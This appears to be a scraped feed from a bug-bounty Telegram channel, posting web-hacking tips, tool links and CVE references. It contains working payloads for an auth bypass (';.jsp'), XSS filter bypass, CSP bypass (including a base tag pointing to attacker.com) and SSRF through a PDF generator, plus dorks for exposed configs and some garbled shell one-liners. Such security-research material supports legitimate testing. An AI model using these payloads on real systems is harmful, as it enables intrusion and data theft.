2777
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Part - 2
Web Cache Poisoning
Quick tip: test X-Forwarded-Host + extension flips (.css/.js) — if the edge caches your reflected header or JSON as a “static” asset, every visitor can get poisoned JS or tokens.
Read 5 practical PoCs & seeding recipes →
Aacle/web-cache-poisoning-part-2-weaponizing-headers-url-discrepancies-bbb7b2c0159a" rel="nofollow">https://medium.com/@Aacle/web-cache-poisoning-part-2-weaponizing-headers-url-discrepancies-bbb7b2c0159a
Web Cache Poisoning Tips
Attacker mindset — don’t bruteforce: look for what the cache keys include. Host headers, cookies, query strings, Accept headers, and odd edge-case headers often end up in the key.
Make the app include your input in the key → you control cached output.
Read Full Article : Aacle/web-cache-poisoning-part-1-understanding-the-beast-d303f1741e48" rel="nofollow">https://medium.com/@Aacle/web-cache-poisoning-part-1-understanding-the-beast-d303f1741e48
How to Hack JWT using Burp Suite?
https://payatu.com/blog/jwt-vulnerabilities/
🔐 *How to Secure Your APIs – A Practical Guide*
APIs are the backbone of modern apps — but without security, they become open doors to attacks. Here's how to lock them down effectively:
---
✅ *1. Use Authentication & Authorization*
- Implement *OAuth2*, *JWT*, or *API keys*
- Enforce *role-based access control (RBAC)*
---
🔐 *2. Validate Inputs Strictly*
- Sanitize user inputs
- Use strong data validation (e.g., Joi, Yup)
- Prevent SQL & NoSQL injection
---
📦 *3. Rate Limiting & Throttling*
- Control request frequency to avoid abuse
- Use tools like *NGINX*, *API Gateway*, or *Cloudflare*
---
📜 *4. Use HTTPS Everywhere*
- Encrypt all data in transit
- Never expose APIs over HTTP
---
🕵️♂️ *5. Monitor & Log*
- Track unusual behavior
- Use centralized logging (e.g., ELK, Datadog)
---
🧱 *6. CORS & Firewall Rules*
- Restrict allowed origins
- Protect using *WAFs* and IP whitelisting
---
Secure APIs = Safe apps + Protected data + Trusted users
Build smart. Build safe.
🌐A big curated list of awesome resources useful during Penetration testing, Vulnerability assessments, Red/Blue Team operations, Bug Bounty and more🧠
Online tools for search info about:
- exploit⭐️
- vulnerabilities⭐️
- people⭐️
- emails⭐️
- phone numbers⭐️
- domains⭐️
- certificates⭐️
and more❤️.
https://github.com/edoardottt/awesome-hacker-search-engines
Learn Hacking from Basic to Pro❤️
Hey Hunter's,
Darkshadow here back again!
✨Authentication bypass method:
✅Steps:
1. Target..com/carbon/server-admin/memory_info.jsp = redirect to login page [301 status]
2. Target..com/carbon/server-admin/memory_info.jsp;.jsp = gives the page content without authentication [200 status]
Payload 👉🏼 ;.jsp
Hey Hunters,
DarkShadow here back again, dropping an
interesting XSS input sanitization bypass method.
You might have noticed that most websites currently use input sanitization by blocking certain tags and events, right!? Not really 😅
Okay, so first, have a look at some example tags that could trigger XSS:
script, img, a, iframe, object, video, audio, form, meta
<script>alert(1)</script>
alert(1)
<script <img>> alert(1) </script </img>>
<script <img>>
<script <img>> → remove <img> → <script>
</script </img>> → remove </img> → </script>
<script>alert(1)</script>
JSMap Inspector - A powerful, offline, single-file HTML tool designed for developers and security researchers to inspect and analyze JavaScript Source Map (.js.map) files.
https://github.com/ynsmroztas/JSMap-Inspector
🌀Download all bug bounty programs domains in scope items 🎯
😉Get a full list of domains from active bug bounty programs across platforms like HackerOne, Bugcrowd, Intigriti, and more – all in one place!💥
👇🏼Step 1: Download the domains.txt file
📂step 2: Extract only main/root domains
`cat domains.txt | awk -F '.' '{print $(NF-1)"."$NF}' | grep -Eo '([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}' | sort -u > main_domains`
📂Step 3: Extract all IP addresses:
`grep -Eo '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' domains.txt > ips.txt`
Don't forget to give reactions❤️
🔥Oneliner to download ALL of @assetnote's wordlists:
⌨️ wget -r --no-parent -R "index.html*" wordlists-cdn.assetnote.io/data/ -nH -e robots=off
Google Dork - XSS Prone Parameters 🔥site:example[.]com inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:&
🔥Google Dork - Exposed Configs 🔍site:example[.]com ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess | ext:json©TakSec
https://x.com/livingdevops/status/1974105605431349682?t=zhTSA-5rSrgr27dqGo-QSw&s=35
Читать полностью…
🔥BB TARGET - https://www.lockheedmartin.com/en-us/contact/vulnerability-disclosure-policy.html
Читать полностью…
🔥 SSRF hunters — 3 tiny tricks that turn “maybe” into provable (one-request) POCs — read the full playbook👇
• ⏱️ Timing-delay
• 🔁 Subdomain-rotation
• 🏷️ Header-correlation
Read the full Medium guide ➡️ Aacle/ssrf-part-3-advanced-tricks-timing-channels-out-of-the-box-detection-693c07c97015" rel="nofollow">https://medium.com/@Aacle/ssrf-part-3-advanced-tricks-timing-channels-out-of-the-box-detection-693c07c97015
First, understand this :
Content Security Policy = No XSS
It just means "XSS with extra steps"
🟩 : 70% of CSPs I encounter have misconfigurations that make them completely useless. #bugbounty #infosec
Here are the 👇 5 deadly mistakes developers make:
𝗠𝗶𝘀𝘁𝗮𝗸𝗲 #𝟭: '𝘂𝗻𝘀𝗮𝗳𝗲-𝗶𝗻𝗹𝗶𝗻𝗲'
If you see this in script-src, you've already won.
Policy: script-src 'self' 'unsafe-inline'
Bypass: <script>alert(1)</script>
It literally allows ALL inline scripts.
𝗠𝗶𝘀𝘁𝗮𝗸𝗲 #𝟮: 𝗪𝗶𝗹𝗱𝗰𝗮𝗿𝗱 𝗗𝗼𝗺𝗮𝗶𝗻𝘀 (*.𝗴𝗼𝗼𝗴𝗹𝗲.𝗰𝗼𝗺)
"It's Google, what could go wrong?"
Everything.
This JSONP endpoint on Google works on tons of apps: http://
accounts.google.com/o/oauth2/revoke?callback=alert
𝗠𝗶𝘀𝘁𝗮𝗸𝗲 #𝟯: 𝗠𝗶𝘀𝘀𝗶𝗻𝗴 𝗯𝗮𝘀𝗲-𝘂𝗿𝗶
This is my favorite because it's ALWAYS overlooked.
Inject: <base href="https://attacker.com">
Now ALL relative script paths load from your domain.
𝗠𝗶𝘀𝘁𝗮𝗸𝗲 #𝟰: 𝗙𝗶𝗹𝗲 𝗨𝗽𝗹𝗼𝗮𝗱𝘀 𝗼𝗻 𝗪𝗵𝗶𝘁𝗲𝗹𝗶𝘀𝘁𝗲𝗱 𝗗𝗼𝗺𝗮𝗶𝗻𝘀
Policy: script-src 'self' http://cdn.example.com
If you can upload files to that CDN → game over.
upload a .js file disguised as a profile picture. Direct S3 URL. Loaded as script.
𝗠𝗶𝘀𝘁𝗮𝗸𝗲 #𝟱: 𝗧𝗿𝘂𝘀𝘁𝗶𝗻𝗴 𝗖𝗗𝗡𝘀 𝘄𝗶𝘁𝗵 𝗢𝗹𝗱 𝗟𝗶𝗯𝗿𝗮𝗿𝗶𝗲𝘀
AngularJS versions < 1.6.0 have sandbox escapes.
If a whitelisted domain hosts old Angular → you can execute code.
Check http://ajax.googleapis.com for old versions. This works more often than you'd think.
𝗧𝗵𝗶𝘀 𝗶𝘀 𝗷𝘂𝘀𝘁 𝘁𝗵𝗲 𝗯𝗲𝗴𝗶𝗻𝗻𝗶𝗻𝗴.
𝗣𝗮𝗿𝘁 𝟮: Advanced nonce exploitation, AngularJS escapes, service workers
𝗣𝗮𝗿𝘁 𝟯: DOM clobbering, mutation XSS, scriptless attacks
𝗙𝘂𝗹𝗹 𝗴𝘂𝗶𝗱𝗲 + 𝘁𝗲𝘀𝘁𝗶𝗻𝗴 𝗰𝗵𝗲𝗰𝗸𝗹𝗶𝘀𝘁:
Aacle/a-bug-hunters-guide-to-csp-bypasses-part-1-69b606fd2699" rel="nofollow">https://medium.com/@Aacle/a-bug-hunters-guide-to-csp-bypasses-part-1-69b606fd2699
This book is for for understanding how API's works and developed
Читать полностью…
🚨CVE-2025-64095 (CVSS 10.0) : A Critical Flaw in DNN Platform Allows Unauthenticated Website Overwrite
⚡Dorks
HUNTER : http://product.name="DotNetNuke"
Extract all endpoints from a JS File and take your bug 🐞
- Method onewaybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '/'
'{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s/[;}\)>]/\n/g\" | grep -Po \" (L'1|\"](https?: )?[/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['||\"](https?:)?[/1{1,2}[^'||\"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu
- Method twocat JS.txt | grep -aop "(?<=(\"|\'|' ))\/[a-zA-Z0-9?&=\/-#.](?= (\"||'|'))" | sort -u | tee JS.txt
#infosec #cybersec #bugbountytips
☄️JSRecon-Buddy - A simple browser extension to quickly find interesting security-related information on a webpage.
🔴https://github.com/TheArqsz/JSRecon-Buddy
Black Hat USA 2025 Slides and files
Conference presentation slides
🔼GitHub
🔼InfoCon
❤ Share & Support & Reaction Us
🧩 #event
Hey Hunter's,
DarkShadow here back again!
SSRF in pdf generation!
this api endpoint send the pdf generation request:
POST /api/v1/convert/markdown/pdf
Add this payload:
<img src=‘burp collab url’ />
comes 200ok and hit request in burp collaborator.
You can follow me in my x.com/darkshadow2bd
#ssrf #bugbountytips
☄️ Cheapest VPS for Bug Bounty & Pentesting
⚠️ https://brutsecurity.medium.com/cheapest-vps-for-bug-bounty-pentesting-fc6686572ee3
☄️ Malicious PDF Generator - Generate a bunch of malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.sh
✨ https://github.com/jonaslejon/malicious-pdf
#exploit
#AppSec
#Threat_Research
1⃣ Zimbra Exploit Analysis (CVE-2025-27915)
https://strikeready.com/blog/0day-ics-attack-in-the-wild
// These exploits take advantage of .ics files to breach vulnerable systems
2⃣ Notepad++ DLL Hijacking (CVE-2025-56383)
https://github.com/zer0t0/CVE-2025-56383-Proof-of-Concept
// If the threat actor has the ability to replace an applications DLL, they would have to ability to put malware directly in the same location...
3⃣ Lenovo Display Control Center - A simple ACL Exploit (CVE-2024-2175)
https://neodyme.io/de/blog/lenovo_dcc_lpe_logic
// Two operating methods are presented for achieving local administrative access: a race condition-based approach and a junction path exploitation technique
🔥FRESH BB TARGET - https://visioninstitutecolorado.com/.well-known/security.txt
Читать полностью…
I request a small support in boosting my channel where it help me to be more consistent and more active...
/channel/boost/bugbounty_tech
based on the poll, i have understood is the members of group are looking for AI content too.. thanks for all the responses and i will make plan what content should be add here and what not .
Читать полностью…